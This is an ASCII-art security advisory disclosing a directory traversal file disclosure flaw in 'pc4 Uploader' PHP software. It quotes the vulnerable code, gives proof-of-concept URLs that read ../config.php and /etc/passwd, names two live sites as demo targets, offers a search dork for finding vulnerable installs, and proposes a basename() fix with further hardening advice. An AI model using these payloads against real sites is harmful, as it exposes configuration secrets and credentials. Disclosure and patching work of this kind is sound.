|| || | || o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_, ( : / (_) / ( . ___________________ _/QQQQQQQQQQQQQQQQQQQ\__ __/QQQ/````````````````\QQQ\___ _/QQQQQ/ \QQQQQQ\ /QQQQ/`` ```QQQQ\ /QQQQ/ Advisory \QQQQ\ |QQQQ/ By Qabandi \QQQQ| |QQQQ| |QQQQ| |QQQQ| From Kuwait, PEACE... |QQQQ| |QQQQ| |QQQQ| |QQQQ\ iqa[a]hotmail.fr /QQQQ| \QQQQ\ __ /QQQQ/ \QQQQ\ /QQ\_QQQQ/ \QQQQ\ \QQQQQQQ/ \QQQQQ\ /QQQQQ/_ ``\QQQQQ\_____________/QQQ/\QQQQ\_ ``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\ ``````````````````` ````` =Vuln: pc4arb - pc4 Uploader <= 10.0 Remote File Disclosure Vulnerability =INFO: http://pc4arb.com/article-48.html =BUY: ~~~ =Download: ~~~ =DORK: intext:"Pictures of Whale Penis" ____________ _-=/:Conditions:\=-_ ```````````````````````````````````````````````````````````````````````````````` none ---------------------------------------===-------------------------------------- _________________ _-=/:Vulnerable_Code:\=-_ ```````````````````````````````````````````````````````````````````````````````` // in "./pc4uploader/upfiles/index.php" function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); <-----------------------------//opens $fn with no filtering or precautions taken if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } // Function displayimage() is later called $file = $_GET['file']; <---------------------------------// again, not filtered or anything. //.. //.. //.. //.. 
displayimage( $file, "Thu, 01 Jan 2006 12:00:00 GMT", $fs ); ---------------------------------------===-------------------------------------- _______ _-=/:P.o.C:\=-_ ```````````````````````````````````````````````````````````````````````````````` http://localhost/pc4uploader/upfiles/index.php?file=../config.php http://localhost/pc4uploader/upfiles/index.php?file=/etc/passwd demo: http://upload.traidnt.net/upfiles/index.php?file=../config.php {Save File to view the code if needed} http://uploader.pc4arb.com/upfiles/index.php?file=../config.php {view source} ---------------------------------------===-------------------------------------- __________ _-=/:SOLUTION:\=-_ ```````````````````````````````````````````````````````````````````````````````` //Use this displayimage() function instead, notice the changes.. function displayimage( $fn, $lastMod, $fs ) { global $out_Types; $fn = basename($fn); $ext = explode( ".", $fn ); $ext_i = count( $ext ) - 1; $file_ext = $ext[$ext_i]; header( "Last-Modified: ".$lastMod ); header( "ETag: ".getetag( $fn ) ); header( "Accept-Ranges: bytes" ); header( "Content-Length: ".$fs ); header( "Content-Type: ".$out_Types[$file_ext] ); $fp = fopen( $fn, "rb" ); if ( function_exists( fpassthru ) ) { fpassthru( $fp ); } else { $temp = fread( $fp, $fs ); echo $temp; } fclose( $fp ); return; } // The only change is the added line $fn = basename($fn);. basename() strips every directory component, so "../../config.php" becomes "config.php" and "/etc/passwd" becomes "passwd"; the relative fopen() then resolves inside ./upfiles/ only, and because ./upfiles/config.php does not exist the script falls through to its normal error path instead of disclosing the file. // Caveat: this stops directory traversal but nothing else. Any file that really lives in ./upfiles/ (index.php itself, dot-files, anything an uploader managed to place there) is still served, an extension with no entry in $out_Types produces an empty Content-Type header, fopen() is never checked for failure before fpassthru()/fread() are called, and function_exists( fpassthru ) passes an undefined constant rather than the string 'fpassthru'. A stricter fix rejects any name whose extension is not a key of $out_Types, refuses "index.php" and names starting with ".", tests the fopen() result, and — if the upload directory can be configured — compares realpath() of the resolved file against realpath() of the upload directory before opening it. // The advisory's author also notes that ./include/default.gif must be moved to ./upfiles/default.gif, presumably because the script reaches the fallback image through this same parameter and basename() now strips its directory; verify this against the script before deploying. // With those changes the endpoint can only serve files that were intended to be public. ---------------------------------------===-------------------------------------- ______________________________________________________________________________ / \ | Tem al-tableegh 3an el-thaghra min sinat yaddi | \______________________________________________________________________________/ \ No More Private / ````````````````` Salamz to All Muslim Hackers.